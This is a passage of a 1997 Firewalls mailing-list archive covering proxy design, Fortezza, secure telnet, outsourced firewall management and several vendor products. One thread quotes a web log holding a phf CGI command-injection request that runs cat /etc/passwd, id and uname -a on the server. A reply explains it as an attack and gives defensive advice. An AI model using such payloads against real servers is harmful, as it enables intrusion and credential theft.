honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA27517 for firewalls-outgoing; Wed, 4 Jun 1997 11:16:02 -0700 (PDT) Received: from dskfw1.funb.com ([205.152.122.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA27450 for ; Wed, 4 Jun 1997 11:15:39 -0700 (PDT) Received: (from uucp@localhost) by dskfw1.funb.com (8.8.5/8.8.5) id OAA11040; Wed, 4 Jun 1997 14:18:48 -0400 (EDT) Received: from cm_mailhost.capmark.funb.com(168.175.82.50) by dskfw1.funb.com via smap (3.2) id xma011021; Wed, 4 Jun 97 14:18:28 -0400 Received: from funws302.capmark.funb.com (funws302 [168.175.7.54]) by cm_mailhost.capmark.funb.com (8.7.5/8.7.3) with ESMTP id OAA05123; Wed, 4 Jun 1997 14:18:23 -0400 (EDT) Received: (mhorn@localhost) by funws302.capmark.funb.com (8.6.12/8.6.12) id OAA10294; Wed, 4 Jun 1997 14:18:22 -0400 Message-ID: <19970604141821.59906@capmark.funb.com> Date: Wed, 4 Jun 1997 14:18:21 -0400 From: "Mark Horn [ Net Ops ]" To: Anton J Aylward Cc: Firewalls@GreatCircle.COM Subject: Re: Plug-gw- One to many relationship References: <3.0.32.19970604114909.00952700@the-wire.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.75 In-Reply-To: <3.0.32.19970604114909.00952700@the-wire.com>; from Anton J Aylward on Wed, Jun 04, 1997 at 11:49:24AM -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Anton J Aylward says: >No, no, no, what *I* want and what about 10^7 other sites want is this... > > client A W server C > firewall server D > client B server F > server G > server H > server I > server K > >Now that's what *I* call a one to many mapping. >You come up with a good way to do this and you'll be famous. Well, as MJR said, it can be done. Get out your kernel hacking tools... No matter what you do, you can *not* escape the fact that you have to tell plug-gw what the real server is. And unfortunately, with plug-gw the only place that you can store that kind of information is in the headers. So you have to come up with some sort of hack to allow for that specification. On the table there are two solutions: o Put the real IP address of the server in the headers and have plug-gw intercept it and transparently proxy it. o Put an alias IP address in the headers and have plug-gw interpret the translation. If you can come up with some other way to specify the real server in the TCP/IP packet headers from the client, add it to the list. If it's straight forward enough, I'd probably implement it because I have a need for it. Of course, I wouldn't release the patch... Cheers, -- Mark Horn PGP Public Key available from: http://www.es.net/hypertext/pgp.html PGP KeyID/fingerprt: 00CBA571/32 4E 4E 48 EA C6 74 2E 25 8A 76 E6 04 A1 7F C1 From owner-firewalls-outgoing Wed Jun 4 19:12:57 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA27999 for firewalls-outgoing; Wed, 4 Jun 1997 11:19:29 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA27710 for ; Wed, 4 Jun 1997 11:18:27 -0700 (PDT) Received: from relay1.shore.net (relay1.shore.net [192.233.85.129]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with ESMTP id LAA23041 for ; Wed, 4 Jun 1997 11:13:28 -0700 (PDT) Received: from [198.115.179.81] (vin.shore.net [198.115.179.81]) by relay1.shore.net (8.8.3/8.8.3) with ESMTP id OAA22108 for ; Wed, 4 Jun 1997 14:10:13 -0400 (EDT) Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 4 Jun 1997 14:12:24 -0500 To: firewalls@greatcircle.com From: Vin McLellan Subject: Fortezza's Fate?? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Anyone out there watching Fortezza's Doom unfold? Fortezza was the US DoD's crypto (PCMCIA only?) smartcard, part of the Capstone family introduced back with the original Clipper proposal for non-classified DoD use and other US government applications -- and, for awhile, heavily promoted to the civilian US government agencies, as well as to industry. Fortezza has Skipjack symmetric crypto (160 bit keys, I think) as well as full public-key functionality, but it was designed to complement the Clipper policy, so I recall it tossed off a LEAF escrow copy of each session key to government-established secure "key warehouses" in DoD, Commerce, and Treasury, maybe among other agencies. I presume many of the prominent firewall vendors got involved, since for a time it looked like this was going to be the authentication device used by the US DoD, other federal government employees, and contractors accessing federal systems. Fortezza is -- was? -- also obviously a big deal for network and firewall administrators (and users) at many US government agencies. There are a lot of rumors buzzing around DC these days to the effect that NSA and the Joint Chiefs have tossed in the towel and will, within weeks, approve DoD purchases for non-Fortezza security systems, for both strong authentication, and (I presume) more standard PKI. I understand they have been briefing US.gov security staff and the contractors who have been working on Fortezza apps. I also understand that DoD is considering approving Fortezza in software applications?!? I'm seeking some perspective on what happened and why. I'm intrigued, but ill informed. (Please feel free to correct anything above.) Suerte, _Vin Vin McLellan + The Privacy Guild + 53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548 -- <@><@> -- From owner-firewalls-outgoing Wed Jun 4 19:16:03 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id SAA20079 for firewalls-outgoing; Wed, 4 Jun 1997 18:50:53 -0700 (PDT) Received: from gateway.contact.com.sg (gateway.contact.com.sg [203.120.144.21]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id SAA20009 for ; Wed, 4 Jun 1997 18:50:32 -0700 (PDT) Received: from genesis.contact.com.sg ([172.20.10.86]) by gateway.contact.com.sg (Netscape Mail Server v2.02) with ESMTP id AAA11202; Thu, 5 Jun 1997 09:45:35 +0800 Received: from localhost (tsanghan@localhost) by genesis.contact.com.sg (8.8.3/8.8.3) with SMTP id JAA16150; Thu, 5 Jun 1997 09:50:39 +0800 X-Authentication-Warning: genesis.contact.com.sg: tsanghan owned process doing -bs Date: Thu, 5 Jun 1997 09:50:38 +0800 (SGT) From: tsanghan@contact.com.sg (Wong Tsang Han) To: Jose Luis Delgado cc: firewalls@GreatCircle.Com Subject: Re: Secure Telnet! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You can try http://www.datafellows.com/ On Wed, 4 Jun 1997, Jose Luis Delgado wrote: > > > Ssh (Secure Shell) is a program to log into another computer over a > > network, to execute > > commands in a remote machine, and to move files from one machine to > > another. It provides strong > > authentication and secure communications over insecure channels. > > > Hi to everyone! > > Does anybody know, where can I find shareware/freeware SECURE telnet for > NT??? > > Thanks in advance! > From owner-firewalls-outgoing Wed Jun 4 20:09:49 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA00811 for firewalls-outgoing; Wed, 4 Jun 1997 11:34:18 -0700 (PDT) Received: from cpk-mail-relay1.bbnplanet.com (cpk-mail-relay1.bbnplanet.com [192.239.16.198]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA00697 for ; Wed, 4 Jun 1997 11:33:46 -0700 (PDT) Received: from endeavour.transquest.com (transquest.com [206.240.42.2]) by cpk-mail-relay1.bbnplanet.com (8.7.6/MAIL-RELAY) with SMTP id OAA02895 for ; Wed, 4 Jun 1997 14:37:27 -0400 (EDT) Received: from gcs-tq.transquest.com by endeavour.transquest.com via smtpd (for cpk-mail-relay1.bbnplanet.com [192.239.16.198]) with SMTP; 4 Jun 1997 18:26:23 UT Received: from SATLMSGHUB01 by transquest.com (SMI-8.6/SMI-SVR4) id OAA17311; Wed, 4 Jun 1997 14:37:55 -0400 Received: by SATLMSGHUB01 with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.995.52) id <01BC70F5.8CB79070@SATLMSGHUB01>; Wed, 4 Jun 1997 14:42:38 -0400 Message-ID: From: "Walczak, Joe" To: "'firewalls@greatcircle.com'" Subject: RE: ISP Connection Date: Wed, 4 Jun 1997 14:39:43 -0400 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.995.52 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My only comment here is that I would not let ANYONE else manage/operate my firewall, ISP or not!!! Secondly, I would not tell anyone which firewall am I using. The ISP does not need to know that information. Joe Walczak joe.walczak@transquest.com >---------- >From: Mariko Yashada[SMTP:mariko@grfn.org] >Sent: Wednesday, June 04, 1997 3:01 PM >To: Firewalls Mailing List >Subject: Re: ISP Connection > > > >Thank you for all your comments. Last fall our plan was to connect to the >Internet through MCI. We security people said fine, but you will need a >firewall for any connections between the Internet and the Enterprise >Network. So we did an evaluation of firewalls and settled on two we felt >best suited our needs. The firewall added enough cost to the project that >it was postponed. It has now been revived using our ISP for the connection >with the hope the ISP can some way offer the security. I see now we should >to follow our original plan and put up a firewall at our end. > > >Here is a related question: > >There is another local ISP who will connect us at T1 and install a firewall >at our location. They will then administer the firewall remotely from their >location. They support three different firewalls, Gauntlet, Firewall-1 and >Borderware. The advantage is the savings in admin costs. Has anyone had any >experience with this type of arrangement? We have also talked to BBN about >their Site Patrol product, which is a remotely managed Gauntlet. > >Thanks, > >Mariko > From owner-firewalls-outgoing Wed Jun 4 20:16:29 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id TAA01241 for firewalls-outgoing; Wed, 4 Jun 1997 19:38:28 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id TAA01227 for ; Wed, 4 Jun 1997 19:38:21 -0700 (PDT) Received: from smtp.usit.net (smtp.usit.net [199.1.48.16]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with ESMTP id TAA01291 for ; Wed, 4 Jun 1997 19:44:28 -0700 (PDT) Received: from gammag_r.ins.com (nash-max47.dynamic.usit.net [205.241.193.175]) by smtp.usit.net (8.8.5/8.8.5) with SMTP id WAA06144; Wed, 4 Jun 1997 22:42:05 -0400 (EDT) Message-Id: <3.0.32.19970604214203.006978f4@pop.usit.net> X-Sender: rlgammag@pop.usit.net X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Wed, 04 Jun 1997 21:42:06 -0500 To: uskanbye@ibmmail.com, firewalls@GreatCircle.COM From: Robert Gammage Subject: Re: Eagle Raptor NT 4.0 and "Local Tunnel" Config Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have done this for nonGSPable (nice nonword huh) protocols. Check out http://www.raptor.com/cs/FAQ/entv4localtunnel.htm for a nicely detailed FAQ. The only gotchas I recall: (1) I felt it odd that the application proxys and GW-Control come up come up completely, and then (later) the tunnels are fired up even though they operate at a lower level (interface-filters, tunnels, then GW-Control in that order). (2) If you define Universe (0.0.0.0/0) as one of the Secure Subnets, it has to be on the "A" end of the tunnel (this is a bug) or GW Control will complain about an illegal network in the log during startup. (3) A tunnel with no filters applied moves everything that meets the address (Source or Destination secure-subnet) criteria. Once you apply a filter (or group of filters) you have then limited the traffic allowed to pass through the tunnel. Otherwise, they are pretty straight-forward and fairly insecure. At 05:13 PM 6/4/97 EDT, uskanbye@ibmmail.com wrote: > >Anybody out there using the local (null) tunnel feature in the Eagle NT 4.0 >firewall? We're attempting to configure this, in conjunction with filters, >to pass some protocols that can't be GSP'd (Data Link Switching/DLSw). > >Any advice/comments/suggestions welcomed. Thanks! > > > --------KANSAS DEPARTMENT OF HEALTH & ENVIRONMENT--------- > ---------------WWW.STATE.KS.US/PUBLIC/KDHE---------------- > --------------Landon State Office Building---------------- > ------------------Phone (913) 296-5643-------------------- > > Robert (Bob) Gammage BAROQUE (adj): Network Systems Engineer When you are International Network Services out of Monet. 615-783-1652 Pager 800 INS-1-INS From owner-firewalls-outgoing Wed Jun 4 20:24:51 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA25119 for firewalls-outgoing; Wed, 4 Jun 1997 11:04:50 -0700 (PDT) Received: from firewall1-int.glaxowellcome.com (firewall1.glaxowellcome.com [192.58.204.204]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA24848 for ; Wed, 4 Jun 1997 11:03:58 -0700 (PDT) Received: by firewall1-int.glaxowellcome.com id OAA09690; Wed, 4 Jun 1997 14:10:27 -0400 (EDT) Received: from ussun2m.glaxo.com(152.51.20.99) by firewall1.glaxo.com via smap (3.2) id xma009683; Wed, 4 Jun 97 14:10:04 -0400 Received: by ussun2m.glaxo.com id OAA15665; Wed, 4 Jun 1997 14:05:29 -0400 (EDT) Received: from ussun2f by ussun2f.usglx (SMI-8.6/SMI-SVR4) id OAA02324; Wed, 4 Jun 1997 14:04:23 -0400 Date: Wed, 4 Jun 1997 14:04:23 -0400 (EDT) From: "Gary G. Hull" X-Sender: ggh14854@ussun2f To: Stan Wnuck cc: Firewalls@GreatCircle.COM Subject: Re: getting passwd file via WWW In-Reply-To: <199706041601.JAA03033@honor.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Stan -- Someone from some.remote.location.edu is attempting to capture your /etc/passwd file (password file). It appears that they may have succeeded. I'd suggest you take your server down (off the internet) until you are able to insure you have not been compromised. TO be safe, you will want to change all of your passwords. Also, remove the cgi-bin scripts if you don't need them, or at least change the permissions on them so that only the script owners have rwx to them. On Wed, 4 Jun 1997, Stan Wnuck wrote: > Hi all, > > I have noticed on my WWW log files the following 2 entries. > > some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 140 > some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] "GET /cgi-bin/php.cgi?/etc/passwd" 404 143 > > > Does anyone know anything about these cgi scripts or programs? > Or how dangerous this is? > > > I changed the real source location to a fake some.remote.location.edu to > not let out the bag of the source of this hack, since I am not sure what > my next move would be. > > > Thanks in advance. > > > > Stan Wnuck swnuck@unixpros.com > Unixpros, Inc. > 10 Industrial Way East (908) 389-3295 x542 > Eatontown, NJ 07724 (908) 389-5461 Fax > > PM-CHS Technology Insertion Office > Ft. Monmouth Army Base, NJ (908) 427-2033 / 427-6963 > |/ ---o0o-@@-o0o--------- Gary G. Hull - Technical Consultant Howard Systems International - Glaxo Wellcome Inc. Five Moore Drive - Raleigh, North Carolina 27709 Tel : (919) 941-4867 - Fax : (919) 483-0056 email: ggh14854@ussun2f.glaxo.com From owner-firewalls-outgoing Wed Jun 4 20:30:23 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id UAA09611 for firewalls-outgoing; Wed, 4 Jun 1997 20:17:20 -0700 (PDT) Received: from relay6.UU.NET (relay6.UU.NET [192.48.96.16]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id UAA09584 for ; Wed, 4 Jun 1997 20:17:02 -0700 (PDT) Received: from netevolve.com by relay6.UU.NET with SMTP (peer crosschecked as: [206.136.48.11]) id QQcsoj19473; Wed, 4 Jun 1997 23:21:10 -0400 (EDT) Received: from irwin-s-home-pc ([207.226.56.152]) by netevolve.com (4.1/SMI-4.1) id AA06113; Wed, 4 Jun 97 23:24:02 EDT Message-Id: <3.0.1.32.19970604232411.00969400@netevolve.com> X-Sender: lazar@netevolve.com X-Mailer: Windows Eudora Pro Version 3.0.1 (32) Date: Wed, 04 Jun 1997 23:24:11 -0400 To: Mike Hedlund , zzIML Firewalls From: Irwin Lazar Subject: Re: Do people host WWW servers behind firewalls? Cc: "'Firewalls@GreatCircle.COM'" In-Reply-To: References: <103BEF1175D2D011B83400A0C903EE964331@hurricane.vnw.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 05:35 PM 6/4/97 -0700, Mike Hedlund wrote: > > >On Wed, 4 Jun 1997, zzIML Firewalls wrote: > >> This has been an ongoing planning debate for us... does the potential >> latency and overhead of a firewall potentially point toward putting >> high-access high-performance WWW servers on the net without a firewall? >> Is there a true trade-off of "security vs. performance"? >> > >A firewall doesnt necessarily mean your secure. Carefully securing your >machine(s) at a host level is a good way to start. Its amazing how many >large sites out there dont do basic audits of their own sites. IE; >disabling all nonessential services, etc. The more possible entry points >you eliminate for an intruder, the harder it will be for them to get in. >And by making it more difficult to get in, hopefully they have to do >something which you will notice. > >> Presume that the WWW servers are at a co-location ISP site and don't >> have any "critical data" on them. They are mostly publish sites... >> > >I think for most organizations, who put money into developing a site on >the net, be it web/ftp/chat whatever, have a vested interest in keeping it >secure. Not because they are worried about people seeing data they >shouldnt see, but because of the publicity you will get after being >hacked.. i could see it now.. some CEO of a big company turns on CNN to >hear a story about how a 12 yearold kid hacked his companys website >from school and put up a banner saying 'Im g0d'. It doesnt matter if the >kid got anything important. > That is a very good point. For those who run web servers on Solaris boxes, there is a very good FAQ on how to secure it at http://www.sun.com/sunworldonline/common/security-faq.html. There a quite a few services that can be turned off, and quite a few extras that aren't needed. From owner-firewalls-outgoing Wed Jun 4 20:45:42 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id UAA12481 for firewalls-outgoing; Wed, 4 Jun 1997 20:29:21 -0700 (PDT) Received: from relay1.shore.net (relay1.shore.net [192.233.85.129]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id UAA12356 for ; Wed, 4 Jun 1997 20:28:51 -0700 (PDT) Received: from [198.115.179.81] (vin.shore.net [198.115.179.81]) by relay1.shore.net (8.8.3/8.8.3) with ESMTP id XAA20937; Wed, 4 Jun 1997 23:31:46 -0400 (EDT) Message-Id: In-Reply-To: References: <33956E4A.6590018C@pvt.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 4 Jun 1997 23:34:01 -0500 To: Jose Luis Delgado From: Vin McLellan Subject: Re: Secure Telnet! Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Jose Luis Delgado asked: >Does anybody know, where can I find shareware/freeware SECURE telnet for >NT??? As you probably know, F-Secure (commercial SSH from Datafellows) has NT clients and servers for SSH. But, unfortunately, it is neither free nor freeware. I haven't seen nor heard much about STEL (Secure Telnet) in the past year (not a great sign;-) but you might check out the current STEL package at the Italian CERT, based at U of Milan, to see if their Secure Telnet (STEL) has been extended to NT: ftp://idea.sec.dsi.unimi.it/pub/security/cert-it/ If that doesn't pan out, do a search at COAST, the huge archive at Purdue University, always worth the visit: http://www.cs.purdue.edu/coast/ You might also toss a query the growing cult of those obsessed with improving NT security: the subscribers of ISS's NT-Security List.. There is probably an NT-Security archive at the ISS web site. Another possible resource, check Russ Cooper's NT-Bugtraq archives at: http://ntbugtraq.rc.on.ca/archives/ntbugtraq.html I, for one, would appreciate it if you would report back to this List if you find something free/cheap and useful. Suerte, _Vin Vin McLellan + The Privacy Guild + 53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548 -- <@><@> -- From owner-firewalls-outgoing Wed Jun 4 20:58:31 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA27370 for firewalls-outgoing; Wed, 4 Jun 1997 11:15:11 -0700 (PDT) Received: from inet02.us.abatos.com (gatekeep.us.landisgyr.com [206.175.68.122]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA27291 for ; Wed, 4 Jun 1997 11:14:50 -0700 (PDT) Received: by inet02.us.abatos.com; id OAA10756; Wed, 4 Jun 1997 14:20:25 -0400 (EDT) Received: from inet05.us.abatos.com(204.207.110.249) by gatekeep.us.landisgyr.com via smap (3.2) id xma010752; Wed, 4 Jun 97 14:20:24 -0400 Received: by news.us.landisstaefa.com; id MAA31052; Wed, 4 Jun 1997 12:19:15 -0500 Received: by usbgrexch01.us.landisstaefa.com with Internet Mail Service (5.0.1457.3) id ; Wed, 4 Jun 1997 13:17:39 -0500 Message-ID: <0C673F68C3A0D011A94208002BE526253535@usbgrexch01.us.landisstaefa.com> From: "Kohn, Joav" To: "'Mariko Yashada'" Cc: Firewalls Mailing List Subject: RE: ISP Connection Date: Wed, 4 Jun 1997 13:17:36 -0500 X-Priority: 3 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.0.1457.3) Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk mariko: how you manage the firewall is a delicate balance. having an outside vendor take care of management simplifies things greatly for your organization, gives you an expert on the product, but also means that your needs and concerns regarding the firewall are weighed against their other clients. it really boils down to a matter of trust. outside management of your firewall means trusting an outside company with access to your corporate network. you have to do a gut check to see how you feel about that, as well as with some guys in legal. the main issue with security is not simply getting the f/w to work, but most importantly being able to monitor the activity and have it reflect your corporate security policies. if an outside firm isn't going to keep on top of the box, you really don't know how secure you are. alternatively, the same is true if you don't know what to monitor for. from personal experience, we had a similar setup here initially, with an outside vendor administering our firewall, but on-site & by phone only. it soon became clear that to get the product to work the way we wanted to and to get the security we felt we needed, we had to bring the staff in here to do it. (otherwise i wouldn't be typing this message). -joav kohn sr. technical consultant it/workgroup communications landis & staefa > -----Original Message----- > From: Mariko Yashada [SMTP:mariko@grfn.org] > Sent: Wednesday, June 04, 1997 2:01 PM > To: Firewalls Mailing List > Subject: Re: ISP Connection > > There is another local ISP who will connect us at T1 and install a > firewall > at our location. They will then administer the firewall remotely from > their > location. They support three different firewalls, Gauntlet, Firewall-1 > and > Borderware. The advantage is the savings in admin costs. Has anyone > had any > experience with this type of arrangement? We have also talked to BBN > about > their Site Patrol product, which is a remotely managed Gauntlet. > From owner-firewalls-outgoing Wed Jun 4 20:59:21 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA29974 for firewalls-outgoing; Wed, 4 Jun 1997 14:07:59 -0700 (PDT) Received: from pse01.pios.com (PSE01.PIOS.COM [199.33.129.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id OAA29956 for ; Wed, 4 Jun 1997 14:07:48 -0700 (PDT) Received: by pse01.pios.com; (5.65v3.2/1.3/10May95) id AA28853; Wed, 4 Jun 1997 17:11:27 -0400 Received: from vaxa.PIOS.COM (vaxa.PIOS.COM) by gemini.pios.com (PMDF V5.0-6 #18985) id <01IJOKRB5HBK8WY06V@gemini.pios.com> for firewalls@greatcircle.com; Wed, 04 Jun 1997 17:13:25 -0400 (EDT) Received: from cal_177.sanjose (192.168.14.7) by PIOS.PIOS.COM (PMDF V5.0-6 #18984) id <01IJOKOXCUYO8Y5URK@PIOS.PIOS.COM> for firewalls@greatcircle.com; Wed, 04 Jun 1997 17:11:31 -0400 (EDT) Date: Wed, 04 Jun 1997 14:15:23 -0700 From: Bill Stout Subject: RE: PIX and Firewall-1 X-Sender: stoutb@vaxf.pios.com To: firewalls@greatcircle.com Message-Id: <2.2.32.19970604211523.0070ff68@vaxf.pios.com> Mime-Version: 1.0 X-Mailer: Windows Eudora Pro Version 2.2 (32) Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Peter Carlson writes.... >in whatway are application level gateways more secure than, say, FW-1 or PIX? >There are certainly capabilities that can be provided via application >proxies that can't be provided by any filter-based technologies, but what >types of attacks are a FW-1 or a PIX vulnerable to that application >proxies aren't? Do not replace a proxy server with a 'State-based Firewall'. State-based or packet filter firewalls are being marketed well. Engineers who work for these companies know better than to replace proxies with filters, but they're not stupid enough to kill potential sales. ;) Application proxies monitor commands sent at the application layer, and reconstruct packets so that IP attacks can't be sent beyond the firewall. (From what I understand), State-based (a.k.a. enhanced extended packet filter) security devices inspect the first packet that comes across with enhanced extended filtering rules and can include additional authentication. If that packet passes all filtering rules, remaining packets of that session are passed through without inspection. A properly configured (Internet) firewall comprises of a proxy server protected from the Internet by a packet filter. The better the packet filter (state-based or extended filter), the less work the proxy server has to do as far as inspecting/denying traffic. The packet filter can also protect the proxy server from misc. IP-based attacks. Good applications for packet filter/State-based firewalls are low-security internet feeds and fast low-latency intranet (10/100/155MB/...) security filtering. Not everyone needs a full application proxy firewall, a subject that comes up when I visit Mom-and-Pop small businesses that want a single feed for their 10 PCs. IMHO - State-based firewalls are 'only' packet filters, and for the corporate environment should not replace the traditional proxy server, but work in conjunction with one. _____________________________________________________________________________ Bill Stout (Systems Engineer/Consultant) stoutb@pios.com Pioneer Standard (Computer Systems & Components) http://www.pios.com/ San Jose, CA (Location of 1 of 52 U.S. offices) (408) 954-9100 *My opinions do not reflect that of the company, and visa-versa, thankfully.* From owner-firewalls-outgoing Wed Jun 4 22:30:37 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id WAA08125 for firewalls-outgoing; Wed, 4 Jun 1997 22:12:54 -0700 (PDT) Received: from goliath.camtech.com.au (goliath.camtech.net.au [203.5.73.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id WAA08108 for ; Wed, 4 Jun 1997 22:12:47 -0700 (PDT) Received: from sebastion.sa.camtech.com.au (sebastion.sa.camtech.com.au [203.28.3.2]) by goliath.camtech.com.au (8.8.5/8.8.2) with ESMTP id OAA26641 for ; Thu, 5 Jun 1997 14:46:09 +0930 (CST) Received: (from uucp@localhost) by sebastion.sa.camtech.com.au (8.6.10/8.6.10) id OAA07896 for ; Thu, 5 Jun 1997 14:47:15 +0930 Received: from slingshot(192.168.1.2) by sebastion via smap (V1.3) id sma007877; Thu Jun 5 14:47:05 1997 Received: from tossa (tossa [192.168.1.3]) by slingshot.camtech.com.au (8.6.12/8.6.12) with SMTP id OAA23079 for ; Thu, 5 Jun 1997 14:39:06 +0930 Date: Thu, 5 Jun 1997 14:45:09 +0930 (CST) From: David Murray Reply-To: David Murray Subject: SMTP-MSmail To: firewalls@GreatCircle.COM In-Reply-To: "Your message with ID" Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, This is a little off topic, so I apologise. Howeever, does anyone know off a commercial product that has the functionality for translating MSMail to SMTP, and if possible runs on a Unix box. TIA Dave. _______________________________________________________________________________ David Murray, Phone: +61 8 8303 3300 Systems Engineer, Fax: +61 8 8303 4403 Camtech Group Pty. Ltd. Email: dmurray@camtech.com.au PO Box 128, 8th Floor, Rundle Mall, Adelaide SA 5000, 10 Pulteney Street, South Australia, Adelaide, South Australia, Australia. Australia. 5000 ______________________________________________________________________________ From owner-firewalls-outgoing Wed Jun 4 22:45:30 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id UAA18830 for firewalls-outgoing; Wed, 4 Jun 1997 20:58:14 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id UAA17344 for ; Wed, 4 Jun 1997 20:51:00 -0700 (PDT) Received: from woody.wcnet.org (woody.wcnet.org [205.133.171.1]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with SMTP id UAA03029 for ; Wed, 4 Jun 1997 20:27:21 -0700 (PDT) Received: from ppp-198-10.bgsu.edu by woody.wcnet.org (5.x/SMI-SVR4) id AB05979; Wed, 4 Jun 1997 23:23:57 -0400 Message-Id: <3.0.1.32.19970604232259.009d55c0@woody.wcnet.org> X-Sender: zawodny@woody.wcnet.org X-Mailer: Windows Eudora Pro Version 3.0.1 (32) Date: Wed, 04 Jun 1997 23:22:59 -0400 To: Wong , Daniel_Yamaguchi@iscci.com, Jan Guldentops , "Jeremy D. Zawodny" From: "Jeremy D. Zawodny" Subject: Re: Microsoft Proxy Server Cc: firewalls@GreatCircle.COM In-Reply-To: <33956691.57F6@pdx.com.my> References: <882564A1.00018A6A.00@isc_domino.iscci.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 08:58 PM 6/4/97 +0800, Wong wrote: >On 23 May 1997, Daniel_Yamaguchi@iscci.com wrote: >> >> All About MickySoft Proxy Server >> >> Security (...???) >> >> Microsoft's Proxy Server was subjected to extensive security testing and >> evaluation from independent testing agency, Coopers & Lybrand's Information >> Technology Security Services and is resistant to common attacks such as "IP >> Spoofing", 'SATAN", and "ISS." >> >C & L is an accounting and consulting firm (correct me if I'm wrong). >What do >they know about TCP/IP ports, filters (packet-level, application-level), >encryption etc ? >They might talk about this and that, but do they know how to configure a >proxy server >or a firewall ? Quite a lot, I'd imagine--that is, if they're anything like their peers: Andersen Consulting, Ernst & Young, etc... Much of their business now comes from consulting on topics like network security, architectures, and so on. You'd be surprised, I think. How do I know? I almost went to work for Ernst & Young Consulting and met some of their best people. They *do* know their stuff. >> Manageability & Ease of Use >> >> Integrated with NT User Directory Services, Microsoft Proxy Server allows: >> >Directory Service? Are you sure? Using NOVELL NDS or BANYAN Streetalk ? >Or LDAP? As the message said, MS Proxy uses NT's directory services (as in their domain security model) to perform authorization and authentication. >> Easy Administration provided by a clean, easy to understand and easy to >> administer interface. >> >How do you administer multiple servers? And they are spread nation-wide? >Unless you are running NetWare 4.x or Banyan. If their all part of the same master domain, you administer them the same way you'd administer any other NT services running on many NT boxes on a WAN. This is really a non-sequitor. >> Remote Administration via Internet Service Manager allows Microsoft Proxy >> Server to be managed from any Windows NT system on the network. >> >I thought only NetWare have a utility called "rconsole" ? What's your point? >> Web Proxy >> >> Multi-Platform Support - The Web Proxy Server supports all platforms >> including: >> Windows NT Server >> Windows NT Workstation >> Windows '95 >> Windows for 